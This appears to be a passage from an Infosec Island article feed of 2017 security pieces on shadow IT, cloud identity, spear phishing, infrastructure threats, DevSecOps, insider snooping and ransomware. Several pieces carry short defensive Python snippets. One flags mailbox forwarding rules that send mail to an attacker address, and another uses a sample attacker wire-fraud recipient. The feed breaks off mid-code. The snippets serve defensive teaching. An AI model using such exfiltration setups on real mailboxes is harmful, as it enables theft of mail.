Infosec Island Latest Articles

Shadow IT: The Invisible Network
Tue, 14 Nov 2017 06:02:00 -0600

The term “shadow IT” is used in information security circles to describe the “invisible network” that user applications create within your network infrastructure. Some of these applications are helpful and improve efficiency, while others are an unwanted workplace distraction. However, all of them bypass your local IT security, governance and compliance mechanisms.

The development of application policies and monitoring technology has lagged far behind the use of cloud-based business services, as researchers note in SkyHigh’s Cloud Adoption and Risk Report. It states, “The primary platform for software applications today is not a hard drive; it’s a web browser. Software delivered over the Internet, referred to as the cloud, is not just changing how people listen to music, rent movies, and share photos. It’s also transforming how business is conducted.” Recent studies show that businesses following this trend of migrating operations to the cloud increased productivity by nearly 20 percent over those that did not.

Shifting to a new security model before we determine the rules  

Traditional security thinking and products have focused solely on keeping the network and those within it safe from outside threats, and on auditing information from users, devices and alerts. The application revolution is now pushing security teams beyond traditional network boundaries and into the cloud before acceptable-use policies and new auditing and compliance parameters have been established. It is much more efficient to lay the auditing and policy groundwork first, and then allow security operations to adapt to this new element of application awareness.

Why does application awareness change security operations so drastically? Because it:

  • Emphasizes outgoing (as opposed to incoming) communication
  • Requires relating users and devices to applications (a correlation older tools can’t perform)
  • Shifts the focus away from signature detection and into analytics and policy
  • Requires creating network and device use policy and implementing a means to track and measure it
  • Requires pulling logs from cloud services
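The second requirement above, relating users and devices to the applications they reach, can be sketched in a few lines. This is a hypothetical illustration, not any vendor's implementation; the record fields (`user`, `device`, `app`) are assumptions for the example:

```python
from collections import defaultdict

def app_usage(flow_logs):
    """Group outgoing flow records into an app -> {(user, device), ...} map."""
    usage = defaultdict(set)
    for rec in flow_logs:
        usage[rec["app"]].add((rec["user"], rec["device"]))
    return usage

# Simplified outgoing-flow records of the kind passive monitoring could yield
logs = [
    {"user": "alice", "device": "laptop-17", "app": "dropbox.com"},
    {"user": "bob",   "device": "desk-04",   "app": "dropbox.com"},
    {"user": "alice", "device": "laptop-17", "app": "mail.google.com"},
]

for app, pairs in sorted(app_usage(logs).items()):
    print(app, "->", sorted(pairs))
```

Even a simple inversion like this turns anonymous outbound traffic into an answer to "who is using what, from where," which is the starting point for any acceptable-use policy.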

Beyond the security implications, there are important governance challenges in developing new application policies. While the discussion of implementing application awareness is mostly technical, the way employees use applications can also be deeply personal. Deciding to allow or block Facebook, Twitter, Dropbox, BitTorrent, Tor and personal Gmail accounts touches a human factor that goes beyond merely stopping viruses and preventing breaches. Yet allowing such applications (especially Tor) can increase the level of risk exponentially, even beyond the threats posed by many viruses.

Changing direction to a different point of view – the insider threat

Security follows business, and business is rapidly putting its information in the cloud. Most newer security products have evolved to focus both on what is entering the network and what is leaving the network. However, the shadow IT system often circumvents corporate monitoring and security measures, and allows corporate data to flow outside the organization into the public cloud without proper oversight or control.

Replacing the threadbare notion that threats can only come into our systems from the outside is an ever-growing (and different) point of view, one complemented by products and devices that also monitor outgoing communications. Until recently, this capability was limited to security interests in data loss prevention, policy filtering and compromised-system detection.

Cloud Access Security Brokers (CASBs) are one form of outgoing protection for the network, and they do provide more visibility into network flows. They also add the burden of analysts having to sort through vast quantities of data. One Gartner analyst commented that the competition currently among CASB market providers “is a consequence of newness that limits the consistency and richness of the service they can provide.” He continued, “Data without action is kind of useless. Data has to be automatable so your team can solve the problem and move on to bigger projects.”

At this point, the perspective must pivot to take in both the external threat and the internal, or insider, threat. The focus here is on your employees and their careless, and sometimes malicious, behavior on network-connected devices. While some workers feel entitled to check social media or personal email at work, it is crucial that an organization develop smart, enforceable “acceptable-use” policies, along with regular, relevant training for all workers. This area of governance has lagged far behind the technological solutions; however, it is no less important a piece of the visibility puzzle.

What about solid, consistent governance?

Governance is all about identifying risk and deciding what is acceptable. What is the risk of non-approved applications in a modern enterprise environment? SkyHigh wrote a solid white paper on what it sees as the risk in its Q4 2016 Cloud Adoption Risk Report (PDF). It should be noted that the report has a vested interest in emphasizing the threat, but it does, at a minimum, provide a high-level explanation of the risk.

The report prominently noted that email phishing is the number-one attack vector, while web-based malware downloads are rarer by comparison. Buried deep in the SkyHigh study was the reason we need to effectively capture application usage: while more than 60 percent of organizations surveyed had a cloud use policy, almost all of that group lacked the capability to enforce it. Roughly two-thirds of the services that employees attempt to access are allowed under policy settings, but most enterprises still struggle to enforce blocking policies for the remaining one-third deemed too high-risk for corporate use.

The ideal of control through enforcement is complicated, even with a CASB in place, by security “silos” and a struggle to consistently enforce policies across multiple cloud-based systems. Major violations still occur despite policies: authorized users misusing cloud-based data, accessing data they shouldn’t, synching data with uncontrolled PCs, leaving data in “open shares,” and retaining access despite termination or expiration. In short, even before deploying a CASB, you can build this usage knowledge passively with other tools.

Implementing a means to passively detect applications and tie that activity to users and devices is an essential aspect of governance and risk management. Application awareness addresses the risk that the term shadow IT describes, and it is far less arduous than drafting and implementing policies that could prove controversial with fellow staff members.

About the Author: Chris Jordan is CEO of College Park, Maryland-based Fluency, a pioneer in security automation and orchestration.

Copyright 2010 Respective Author at Infosec Island
4 Questions Businesses Must Ask Before Moving Identity into the Cloud
Wed, 08 Nov 2017 04:50:00 -0600

The cloud has transformed the way we work, and it will continue to do so for the foreseeable future. While the cloud provides a lot of convenience for employees and benefits for companies in terms of cost savings, speed to value and simplicity, it also brings new challenges for businesses. When coupled with Gartner’s prediction that 90 percent of enterprises will be managing hybrid IT infrastructures encompassing both cloud and on-premises solutions by 2020, the challenge becomes increasingly complex.

As is the case with any significant technology initiative, moving infrastructure to the cloud requires forethought and preparation to be successful. For many enterprises, a cloud-first IT strategy means a chance to focus on the core drivers of the business versus managing technology solutions. As these enterprises consider a cloud-first approach, they will undoubtedly be moving their IT infrastructure and security to the cloud. And identity will not be left behind.

The big question for many IT and security operations departments is: can you move your identity governance solution to the cloud? And then, perhaps more importantly, should you? The answers to these questions will vary from company to company and are dependent on the needs of the business and the current structure of the identity program.

As such, here are 4 questions every organization must ask to determine if moving identity into the cloud is the right move for their business:

  • Have you already moved any infrastructure to the cloud?

While many business applications are relatively easy to use as a service, transferring a complex identity management program into the cloud can be more challenging to implement. If your organization is already using infrastructure-as-a-service (e.g. Amazon Web Services or Microsoft Azure) then you’re likely ready to move forward with implementing a cloud-based identity governance program. However, if you haven’t experimented with moving mission-critical apps into the cloud, you should carefully consider whether your organization is prepared before making the leap. 

  • How flexible is your organization?

Regardless of how it is deployed, an effective identity governance solution must provide complete visibility across all of your on-premises and cloud applications. This visibility provides the foundation required to build policies and controls essential for compliance and security. For organizations that don’t have the time or expertise to create custom identity policies or compliance processes from scratch, cloud-based solutions can make successful deployments more attainable. However, if your organization has rigid requirements about how identity management must be configured and deployed, it may be more of a challenge to move to a cloud-based solution.

  • Do you have limited resources?

Deploying an identity governance solution can be both time- and resource-intensive, and effective identity programs require a blend of people, processes and technology to be successful. The cloud is a great option for businesses with limited resources because it doesn’t involve hardware or infrastructure upgrades, making it faster and more cost-effective than on-premises solutions. Cloud-based identity is also great for organizations with smaller IT teams or those without as much specific expertise in the space.

  • How well do you understand your governance needs?

Identity governance is more than just modifying who has access to what. Effective identity governance must also answer whether a user should have access, what kind of access they are entitled to, and what they can do with that access. And while identity governance can be simple to use, what happens behind the scenes can be very complex. This matters because SaaS-based identity governance is not as customizable as an on-premises solution. So, if your identity needs are fairly straightforward, the cloud might be for you; but if your organization requires more complexity and customization, on-premises might still be the best solution.

Whether you’re moving from an on-premises identity governance solution to the cloud or implementing a cloud-based identity governance solution for the first time, it’s important to take a close look at your organization and its needs before taking the next step. With these best practices in mind, you can properly manage identities and limit the risk of inappropriate access to your sensitive business data.

About the author: Dave Hendrix oversees the engineering, product management, development, operations and client services functions in his role as senior vice president of IdentityNow.

Artificial Intelligence: A New Hope to Stop Multi-Stage Spear-Phishing Attacks
Tue, 07 Nov 2017 10:19:11 -0600

Cybercriminals are notorious for conducting attacks that are widespread, hitting as many people as possible, and taking advantage of the unsuspecting. Practically everyone has received emails from a Nigerian prince, foreign banker, or dying widow offering a ridiculous amount of money in return for something from you. There are countless creative examples of phishing, from health drugs promising the fountain of youth to products that will supposedly skyrocket your love life, all in return for your credit card number.

More recently, cybercriminals have been taking an “enterprise approach” to attacks. Much like business-to-business sales teams, they focus on a smaller number of targets, with the objective of obtaining an exponentially greater payoff through extremely personalized and sophisticated techniques. These pointed attacks, labeled spear phishing, leverage impersonation of an employee, a colleague, your bank, or a popular web service to exploit their victims. Spear phishing has been steadily on the rise, and according to the FBI, this means of social engineering has proven extremely lucrative for cybercriminals. Even more concerning, spear phishing is incredibly elusive and difficult to prevent with traditional security solutions.

The most recent evolution in social engineering involves multiple premeditated steps. Rather than targeting company executives with a fake wire-fraud request out of the blue, cybercriminals hunt their victims. They first infiltrate the target organization through an administrative mail account or a low-level employee, then use reconnaissance and wait for the most opportune time to fool the executive by initiating an attack from a compromised mail account. Here are the abbreviated steps commonly taken in these spear phishing attacks, and solutions to stop these attackers in their tracks.

Step 1: Infiltration

Most phishing attempts are glaringly obvious to people who receive cybersecurity training (executives, IT teams) and easy for them to sniff out. These emails contain strange addresses, bold requests, and grammar mistakes that often prompt immediate deletion. However, there is a stark increase in personalized attacks that are extremely hard to detect, especially for people who aren’t trained. Many times, the only tell is a malicious link that reveals itself only when you hover over it with your mouse. Highly trained individuals might spot this flaw; common employees usually won’t.

This is why cybercriminals go after easier targets first. Mid-level sales, marketing, support and operations staff are the most common. This initial attack aims to steal a username and password. Once the attacker has this mid-level employee’s credentials, and if multi-factor authentication is not enabled (in many organizations it is not), they can log into the account.

Step 2: Reconnaissance

At this stage, cybercriminals will normally monitor the compromised account and study email traffic to learn about the organization. Oftentimes, attackers will set up forwarding rules on the account so they don’t have to log in frequently. Analysis of the victim’s email traffic allows the attacker to understand more about the target and organization: who makes the decisions, who handles or influences financial transactions, who has access to HR information, and so on. It also opens the door for the attacker to spy on communications with partners, customers, and vendors.

This information is then leveraged for the final step of this spear phishing attack.
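One passive control against the reconnaissance step above is auditing mailbox forwarding rules for external destinations. The sketch below is hypothetical; the rule structure, the `forward_to` field, and the corporate domain are assumptions for illustration, not any mail platform's actual API:

```python
CORPORATE_DOMAIN = "example.com"  # assumption: your own mail domain

def suspicious_forwarding_rules(rules, domain=CORPORATE_DOMAIN):
    """Return rules that auto-forward mail to an address outside the domain."""
    flagged = []
    for rule in rules:
        target = rule.get("forward_to", "")
        if target and not target.endswith("@" + domain):
            flagged.append(rule)
    return flagged

# Simplified dump of per-mailbox forwarding rules
rules = [
    {"mailbox": "jsmith", "forward_to": "jsmith@example.com"},
    {"mailbox": "jsmith", "forward_to": "collector@attacker.example"},
]
print(suspicious_forwarding_rules(rules))
```

A periodic sweep like this over exported mailbox rules surfaces exactly the kind of silent exfiltration channel described above, often before the attacker moves to step three.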

Step 3: Extract Value

Cybercriminals leverage this learned information to launch a targeted spear phishing attack. They often send customers fake bank account information precisely when a payment is being planned. They can trick other employees into sending HR information or wiring money, or easily sway them to click on links that collect additional credentials and passwords. Since the email comes from a legitimate (albeit compromised) account, such as a colleague’s, it appears totally normal. The reconnaissance allows the attacker to precisely mimic the sender’s signature, tone and text style. So, how do you stop this attacker in his tracks? Thankfully, there is new hope: a multi-layered strategy of well-known methods that organizations can implement to thwart these cybercriminals.

End of the Line for Spear Phishing

There are three things organizations should be employing now to combat spear phishing. The two obvious ones are user training and awareness, and multi-factor authentication. The last, and newest, technology to stop these attacks is real-time analytics and artificial intelligence. Artificial intelligence offers some of the strongest hope in the market today for shutting down spear phishing.

AI Protection

Artificial intelligence to stop spear phishing sounds futuristic and out of reach, but it’s on the market today and attainable for businesses of all sizes, because every business is a potential target. AI has the ability to learn and analyze an organization’s unique communication patterns and flag inconsistencies. By nature, AI becomes stronger, smarter and more effective over time, quarantining attacks in real time while identifying high-risk individuals within an organization. For example, AI would have been able to automatically classify the email in the first stage of the attack as spear phishing, and would even detect anomalous activity in the compromised account, subsequently stopping stages two and three. It also has the ability to stop domain spoofing and unauthorized activity that impersonates your organization to customers, partners and vendors to steal credentials and gain access to their accounts.
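As a heavily simplified illustration of the underlying idea (real products use far richer models than this), a system can learn a baseline of who normally emails whom and flag messages on sender/recipient pairs it has rarely or never seen. Everything here, including the field names and threshold, is an assumption for the sketch:

```python
from collections import Counter

def build_baseline(history):
    """Count how often each (sender, recipient) pair has communicated."""
    return Counter((m["from"], m["to"]) for m in history)

def is_anomalous(message, baseline, min_count=2):
    """Flag a message whose sender/recipient pair is rare in the baseline."""
    return baseline[(message["from"], message["to"])] < min_count

# Learned history: the CEO and CFO routinely exchange mail
history = [{"from": "ceo@corp.example", "to": "cfo@corp.example"}] * 5
baseline = build_baseline(history)

normal = {"from": "ceo@corp.example", "to": "cfo@corp.example"}
odd = {"from": "ceo@corp.example", "to": "wire@attacker.example"}
print(is_anomalous(normal, baseline))  # False: a well-established pair
print(is_anomalous(odd, baseline))     # True: never-before-seen recipient
```

The point is not the counting itself but the principle: a model of "normal" communication makes the attack in step three, a message that is perfectly formatted yet out of pattern, stand out.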


Multi-Factor Authentication

It is absolutely essential for organizations to implement multi-factor authentication (MFA). In the above attack, if multi-factor authentication had been enabled, the criminal would not have been able to gain entry to the account. There are many effective methods for multi-factor authentication, including SMS codes or mobile phone calls, key fobs, biometric thumbprints, retina scans and even face recognition.
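For a sense of what one common MFA factor does under the hood, here is a minimal sketch of a time-based one-time password (TOTP) per RFC 6238, the scheme behind most authenticator apps. A stolen password alone is useless without the shared secret that generates these rotating codes:

```python
import base64
import hmac
import struct
import time

def totp(secret_b32, for_time=None, digits=6, step=30):
    """RFC 6238 time-based one-time password (SHA-1, 30-second steps)."""
    key = base64.b32decode(secret_b32)
    # Count of 30-second intervals since the Unix epoch
    counter = int((for_time if for_time is not None else time.time()) // step)
    msg = struct.pack(">Q", counter)
    digest = hmac.new(key, msg, "sha1").digest()
    # Dynamic truncation: low nibble of the last byte picks a 4-byte window
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test secret "12345678901234567890"; at T=59 the code is 287082
secret = base64.b32encode(b"12345678901234567890").decode()
print(totp(secret, for_time=59))  # prints 287082
```

Because the code changes every 30 seconds and is derived from a secret the attacker never sees, the step-one credential theft described above no longer grants account access on its own.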

Targeted User Training

Employees should be trained and tested regularly to increase their security awareness of the latest and most common attacks. Staging simulated attacks for training purposes is the most effective activity for prevention and for promoting an employee mindset of staying alert. For employees who handle financial transactions or are otherwise higher-risk, it’s worth running fraud simulation testing to assess their awareness. Most importantly, training should be companywide, not focused only on executives.

About the author: Asaf Cidon is Vice President, Content Security Services at Barracuda Networks. In this role, he is one of the leaders for Barracuda Sentinel, the company's AI solution for real-time spear phishing and cyber fraud defense.


Category #1 Cyberattacks: Are Critical Infrastructures Exposed?
Tue, 07 Nov 2017 06:23:00 -0600

Critical national infrastructures are the vital systems and assets pertaining to a nation’s security, economy and welfare. They provide light for our homes, the water in our taps, a means of transportation to and from work, and the communication systems that power our modern lives. The loss or incapacity of such necessary assets, upon which our daily lives depend, would have a truly debilitating impact on a nation’s health and wealth. One might assume, then, that the security of such assets, whether virtual or physical, would be a key consideration. To put that another way, failing to address security vulnerabilities in such important systems would surely be inconceivable.

However, the worrying truth is that the security measures of many of our nations’ critical systems are not, by and large, what they should be. Perhaps this shouldn’t be a surprise. The rapid progression of technology has enabled critical systems to become increasingly connected and intelligent, but with little experience of the problems this connectivity could create, few thought about the systems’ security.

Although this newfound connectivity has helped industries realise great productivity and efficiency benefits, the attack on Ukraine’s power grid in 2015 opened the eyes of many in charge of such industries. After nationwide power outages struck, it became clear that if security is not prioritised, the worst-case scenario could wreak havoc across our nations. Prevention is a must; a short-term fix will only delay the inevitable.

Critical infrastructures: an imminent attack

Not a case of if. But when.

It has been two years since news of Ukraine’s power grid cyberattack made headlines across the globe. And once again, critical infrastructure security has been propelled into the spotlight following a number of recent reports suggesting that a devastating attack is imminent.

The UK’s National Cyber Security Centre (NCSC) revealed in its first annual review that it received 1,131 incident reports, with 590 of these classed as ‘significant’. This included the WannaCry ransomware that took down the NHS. While none of these were identified as category one incidents, i.e. interfering with democratic systems or crippling critical infrastructures such as power, the head of the NCSC, Ciaran Martin, warned there could be damaging attacks in the not too distant future.

Furthermore, US-CERT recently issued an alert warning critical national infrastructure firms, including nuclear, energy and water providers, that they are now at an increased risk of ‘highly targeted’ attacks by the Dragonfly APT group. This follows a report by security researchers Symantec, who recently found that during a two-year period the group has been increasing its attempts to compromise energy industry infrastructure, most notably in the UK, Turkey and Switzerland.

Although no damage has yet been done, the group has been trying to determine how power supply systems work and what could be compromised and controlled as a result. If the group now has the potential ability to sabotage or gain control of these systems should it decide to do so, this should increase the urgency around the preventative measures needed to defend against a future attack. It is therefore hardly surprising that, to combat the rise of such threats, the first piece of EU-wide cybersecurity legislation has been developed to boost the overall level of cybersecurity in the EU: the NIS Directive.

Addressing security from the outset

The potential consequences are disturbing, so infrastructure owners need to consider working in closer collaboration with security experts to ensure the lights remain on. While most in the security industry recognise that there is no silver bullet to ensure total security, we recommend all of those in charge of critical infrastructures ensure they have enough barriers in place to safeguard industrial and critical assets. Proactive regimes that balance defensive and offensive countermeasures, as well as include regular retraining and security techniques such as penetration testing and “red teaming”, are vital to keep defences sharpened.

One of the greatest lessons that should be heeded is that security must be addressed from the outset of infrastructure development and deployment. It has become abundantly clear that cyberattacks against critical infrastructures are only going to increase in the coming months and years. Those in charge of securing such environments must adopt a new preventative mindset, ensuring strong barriers are in place to avert the hijacking of any critical infrastructure before there is a need to clean up the devastating results.

About the author: Jalal Bouhdada is the Founder and Principal ICS Security Consultant at Applied Risk. He has over 15 years’ experience in Industrial Control Systems (ICS) security assessment, design and deployment with a focus on Process Control Domain and Industrial IT Security.

The Evolution from Waterfall to DevOps to DevSecOps and Continuous Security
Fri, 03 Nov 2017 11:01:00 -0500

Software development started with the Waterfall model, proposed in 1956, where the process was pre-planned, set in stone, with a phase for every step. Everything was predictably… sluggish. Every organization involved in developing web applications was siloed, and each had its own priorities and processes. A common situation involved development teams with their own timelines, while quality assurance teams had to test another app and operations hadn’t been notified in time to build out the needed infrastructure. Not to mention, security felt that it wasn’t taken seriously. Fixing a bug made early in the application lifecycle was painful, because testing happened much later in the process. Too often, the end product did not address the business’s needs because the requirements had changed, or the need for the product itself was long gone.

The Agile Manifesto

After roughly 45 years of this inadequacy, the Agile Manifesto emerged in 2001. This revolutionary model advocated for adaptive planning, evolutionary development, early delivery and continuous improvement, and encouraged rapid and flexible response to change. Agile adoption increased, speeding up the software development process by embracing smaller release cycles and cross-functional teams. This meant that stakeholders could navigate and course-correct projects earlier in the cycle. Applications began to be released on time, which translated to addressing immediate business needs.

The DevOps Culture

With this increased agile adoption by development and testing teams, operations became the new holdup. The remedy was to bring agility to operations and infrastructure, resulting in DevOps. The DevOps culture brought together all participants involved, yielding faster builds and deployments. Operations began building automated infrastructure, enabling developers to move significantly faster. DevOps led to the evolution of Continuous Integration/Continuous Delivery (CI/CD), basing the application development process around an automation toolchain. To convey the scale of this shift: organizations advanced from deploying a production application once annually to deploying production changes hundreds of times daily.

Security as a DevOps Afterthought

Although many processes had been automated with DevOps thus far, some functions were ignored. A substantial piece that is not automated, but is increasingly critical to an organization’s very survival, is security. Security is one of the most challenging parts of application development. Standard testing doesn’t always catch vulnerabilities, and many times someone has to wake up at three in the morning to fix that critical SQL injection vulnerability. Security is often perceived as being behind the times, and is commonly blamed for stalling the pace of development. Teams feel that security is a barrier to continuous deployment because its manual testing and configuration halt automated deployments.

As the Puppet State of DevOps report aptly states:

“All too often, we tack on security testing at the end of the delivery process. This typically means we discover significant problems that are very expensive and painful to fix once development is complete, which could have been avoided altogether if security experts had worked with delivery teams throughout the delivery process.”

Birth of DevSecOps

The next iteration in this evolution of DevOps was integrating security into the process: DevSecOps. DevSecOps essentially incorporates security into the CI/CD process, removing manual testing and configuration and enabling continuous deployments. As organizations move toward DevSecOps, there are substantial modifications they are encouraged to undergo to be successful. Instilling security into DevOps demands cultural and technical changes. Security teams must be included in the development lifecycle from day one. Security stakeholders should be involved from planning onward, at every step. They need to work closely with development, testing, and quality assurance teams to discover, address, and mitigate security risks and software vulnerabilities. Culturally, security should become accustomed to rapid change, adapting to new methods that enable continuous deployment. There needs to be a happy medium that results in rapid and secure application deployments.

Security Automation is the Key

A critical step in moving toward DevSecOps is removing manual testing and configuration. Security should be automated and driven by testing. Security teams should automate their tests and integrate them into the overall CI/CD chain. Depending on the individual application, it’s not uncommon for some tests to remain manual, but the overall portion can and should be automated, especially tests that ensure applications satisfy defined baseline security requirements. Security should be a priority from development to pre-production, and should be automated, repeatable and consistent. When done correctly, responding to security vulnerabilities becomes much simpler at each step of the way, which inherently reduces the time taken to fix and mitigate flaws.
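As one concrete example of a baseline test that can run automatically in the CI/CD chain, a build can fail when an application's responses lack a minimum set of security headers. The header list below is an assumed example baseline, not a complete standard, and the response dictionary stands in for whatever your test harness actually captures:

```python
# Example baseline: three headers this hypothetical policy requires
REQUIRED_HEADERS = {
    "Strict-Transport-Security",
    "X-Content-Type-Options",
    "Content-Security-Policy",
}

def missing_security_headers(response_headers):
    """Return the required headers absent from a response, sorted by name."""
    present = {h.title() for h in response_headers}  # normalize casing
    return sorted(h for h in REQUIRED_HEADERS if h not in present)

# Simulated response captured from a test deployment
headers = {"Content-Type": "text/html", "X-Content-Type-Options": "nosniff"}
print(missing_security_headers(headers))
```

In a pipeline, a non-empty result would simply fail the build, turning a security policy into an automated, repeatable gate rather than a manual review step.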

Continuous Security Beyond Deployment

Continuous security does not stop once an application is deployed. Continuous monitoring and incident response processes should be incorporated as well. The automation of monitoring and the ability to respond quickly to events are fundamental to achieving DevSecOps. Security is more important today than ever before. History shows that a security breach can be catastrophic for customers, end users and organizations alike. With more services going online and being hosted in the cloud or elsewhere, the threat landscape is growing at an exponential rate. More software inherently means more security flaws and a larger attack surface. Incorporating security into the daily workflow of engineering teams, and ensuring that vulnerabilities are fixed or mitigated well ahead of production, is critical to the success of any product and business today.

About the author: Jonathan Bregman is a Product Marketing Manager with Barracuda Networks focused on web application firewalls and DDoS prevention for customers. Prior to Barracuda, Jonathan was a research and development engineer with Google.

From the Medicine Cabinet to the Data Center – Snooping Is Still Snooping
Fri, 03 Nov 2017 08:52:00 -0500

We’ve all done it in one form or another. You go to a friend’s house for a party and you have to use the restroom. While you are there, you look behind the mirror or open the cabinet in hopes of finding out some detail -- something juicy -- about your friend. What exactly are you looking for? And why? Are you feeding into some insecurity? You don’t really know; you just know you are compelled to look.

Turns out that same human reaction carries forward to your place of employment. 

At One Identity, we recently conducted a global survey that revealed a lot of eye-opening facts about people’s snooping habits on their company’s network. At a high level, it found that when given the opportunity to look through sensitive company data they may not be permitted to access, employees’ instinct is to snoop. Before we get into specific results, here are the demographics:

  • We surveyed over 900 people from around the world.
  • Countries include the U.S., U.K., Germany, France, Australia, Singapore and Hong Kong.
  • Eighty-seven percent have privileged access to something within their place of employment.
  • They all have some level of security responsibility with varied titles ranging from executive to front-line security pros.
  • Twenty-eight percent are from large enterprises (more than 5,000 employees); 28 percent from mid-sized enterprises (2,000 to 5,000 employees); the remainder are from organizations with fewer than 2,000 employees.

Key Finding Number One: 92 percent of respondents stated that employees at their company attempt to access information that they do not need. 

Think about that. Ninety-two percent of us try to access information we don’t need to get our jobs done. Imagine if any employee at your company could access sensitive data like salaries. That alone would be damaging. Now imagine employees obtained access to financial data, customer data or merger information -- and then shared it. The result could be catastrophic to your business.

Key Finding Number Two: 66 percent of the security professionals surveyed have tried to access information they didn’t need.

Worse yet, these are security people who likely have some form of elevated privileges. This means they are not only attempting to access that information; in many cases they are actually obtaining access and ultimately abusing that privilege.

Key Finding Number Three: Executives are more likely to snoop than managers or front-line workers.

Interestingly, IT security executives are more likely than any other job level to look for sensitive data not relevant to their jobs. This is worrisome, since they tend to have greater access rights and permissions -- once again indicating an abuse of power.

The bottom line here is that organizations should be alarmed by these findings. A common myth among many is that data is safe when it’s on a company network and in the hands of its trusted employees -- it’s the outsiders and hackers you have to look out for. While the latter is certainly true, the data shows that the majority of all employees -- even those within the ranks of IT security groups -- are nosy when given the opportunity to be. Implementing best practices around identity and access management -- like role-based access rights and permissions and applying identity analytics to spot any signs of unusual access behavior -- can help organizations safeguard themselves from letting sensitive data fall into the wrong hands before it’s too late.
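A minimal sketch of the combination described above, role-based access rights plus a simple check that flags access attempts falling outside a user's role, might look like this (the roles, resources, and log format are hypothetical examples):

```python
# Role-based permissions plus a naive "unusual access" check.
# All role names, resources, and users are hypothetical.
ROLE_PERMISSIONS = {
    "hr":      {"salary-data", "personnel-files"},
    "finance": {"financial-reports"},
    "support": {"customer-tickets"},
}

def is_permitted(role: str, resource: str) -> bool:
    """Does the role's access profile include this resource?"""
    return resource in ROLE_PERMISSIONS.get(role, set())

def flag_unusual(access_log):
    """Return accesses outside the user's role -- candidates for review."""
    return [(user, role, res) for user, role, res in access_log
            if not is_permitted(role, res)]

log = [("alice", "finance", "financial-reports"),
       ("bob",   "support", "salary-data")]      # bob is snooping
print(flag_unusual(log))  # [('bob', 'support', 'salary-data')]
```

Real identity-analytics products model behavior statistically rather than with a fixed table, but the principle is the same: define what normal access looks like, then surface the exceptions.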

About the author: Jackson Shaw is senior director of product management at One Identity, an identity and access management company formerly under Dell. Jackson has been leading security, directory and identity initiatives for 25 years.

Healthcare Orgs in the Crosshairs: Ransomware Takes Aim Fri, 03 Nov 2017 04:57:00 -0500 Criminals are using ransomware to extort big money from organizations of all sizes in all industries, but healthcare organizations are especially attractive targets. They are entrusted with the most personal, intimate information people have: not just financial data, but private health and treatment histories. Attackers perceive healthcare IT security as less effective and more outdated than that of other industries. They also know that healthcare organizations tend to have significant cash on hand and a high cost of downtime, and are therefore more likely to pay the ransom for encrypted data. If you fail to take the necessary steps to combat ransomware and other advanced malware and that trust is betrayed, the cost to your business could extend far beyond paying a ransom or a noncompliance fine. If your reputation for safeguarding patient data is damaged, you will be put under the microscope; in some cases, companies never recover and leadership is forced to resign.

Healthcare is making strides but isn’t there yet

There is good news: healthcare organizations have made significant security improvements over the last year. The HIMSS 2017 Cybersecurity Survey makes clear that IT security is now treated as an urgent business challenge for leadership, rather than solely an IT problem. There is a marked increase in the employment of CIOs and Chief Information Security Officers (CISOs) among healthcare organizations, and security shortcomings are being addressed.

Nonetheless, there is still room for improvement, and ransomware attacks continue to be a serious and growing challenge. The organizations that continue to commit vital resources to effective security measures will emerge as winners -- the ones you never read about in the media. Effectively combating ransomware requires a well-thought-out combination of technical and cultural measures.

Detection: discovering the weaknesses

Keeping your network free of ransomware and other advanced malware requires a combination of effective perimeter filtering, strategically designed network architecture, and the capability to detect and eliminate resident malware that may already be inside your network. It is an exercise in cleaning house: your infrastructure likely contains a number of latent threats, and email inboxes are full of malicious attachments and links just waiting to be clicked. Similarly, all applications, whether locally hosted or cloud-based, must be regularly scanned and patched for vulnerabilities. A regular vulnerability management schedule for scanning and patching all network assets may only check the box on the basics, but it is extremely critical for thwarting threats. Building a solid foundation such as this is a fantastic start for effective ransomware detection and prevention.
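Even a trivial overdue-asset check can help enforce such a scanning schedule. The sketch below uses invented asset names and an assumed 30-day scan interval:

```python
# Which assets are overdue for a vulnerability scan?
# Asset names, dates, and the 30-day interval are example assumptions.
from datetime import date, timedelta

SCAN_INTERVAL = timedelta(days=30)

assets = {
    "mail-gateway":   date(2017, 10, 1),   # last successful scan
    "patient-portal": date(2017, 10, 28),
}

def overdue(last_scans, today, interval=SCAN_INTERVAL):
    """Return asset names whose last scan is older than the interval."""
    return sorted(name for name, last in last_scans.items()
                  if today - last > interval)

print(overdue(assets, date(2017, 11, 3)))  # ['mail-gateway']
```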

Prevention: A non-negotiable requirement

Some security technologies are simply requirements in today’s threat landscape. Preventing threats from entering the network requires a modern firewall or email gateway solution that filters out the majority of threats. An effective solution should scan incoming traffic using signature matching, advanced heuristics, behavioral analysis, and sandboxing, and should correlate its findings with real-time global threat intelligence. This relieves employees of the burden of being perfectly trained to spot sophisticated threats. It is also recommended to control and segment network access to minimize the spread of threats that do get in: ensure that patients and visitors can only spread malware within their own limited domain, while also segmenting, for example, administration, caregivers, and technical staff, each with limited, specific access to online resources. Even against the most sophisticated methods, such as spear phishing attacks that impersonate a coworker, there are now machine learning and artificial intelligence solutions that can spot and quarantine threats before they ever reach an employee. The risk for healthcare organizations is immensely reduced when such solutions are deployed as part of an overall security posture. However, when data is encrypted and held for ransom, the fight isn’t over yet.

Backup: Your Last, Best Defense Against Ransomware

When a ransomware attack succeeds, your critical files -- HR, payroll, electronic health records, patient financial and insurance info, strategic planning documents, email records, etc. -- are encrypted, and the only way to obtain the decryption key is to pay a ransom. But if you’ve been diligent about using an effective backup system, you can simply refuse to pay and restore your files from your most recent backup; your attackers will have to find someone else to rob. Automated, cloud-based backup services can provide the greatest security. Reputable vendors offer a variety of simple, secure backup options, priced for organizations of any size and requiring minimal staff time. Advanced solutions can even let you spin up a virtual copy of your servers in the cloud, restoring access to your critical files and applications within minutes of an attack or other disaster.
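A toy illustration of the restore-instead-of-pay idea follows; the snapshot layout is invented for the example and is not any vendor's product:

```python
# Toy versioned backup with "restore latest": after a ransomware hit,
# roll back to the newest snapshot instead of paying.
import shutil, tempfile, time
from pathlib import Path

def back_up(source: Path, vault: Path) -> Path:
    """Copy `source` into a timestamped snapshot directory under `vault`."""
    snap = vault / time.strftime("%Y%m%d-%H%M%S")
    shutil.copytree(source, snap)
    return snap

def restore_latest(vault: Path, target: Path) -> None:
    """Replace `target` with the most recent snapshot."""
    latest = max(vault.iterdir())   # timestamped names sort chronologically
    if target.exists():
        shutil.rmtree(target)
    shutil.copytree(latest, target)

# Simulated incident: back up, get "encrypted", restore.
src = Path(tempfile.mkdtemp()) / "records"
src.mkdir()
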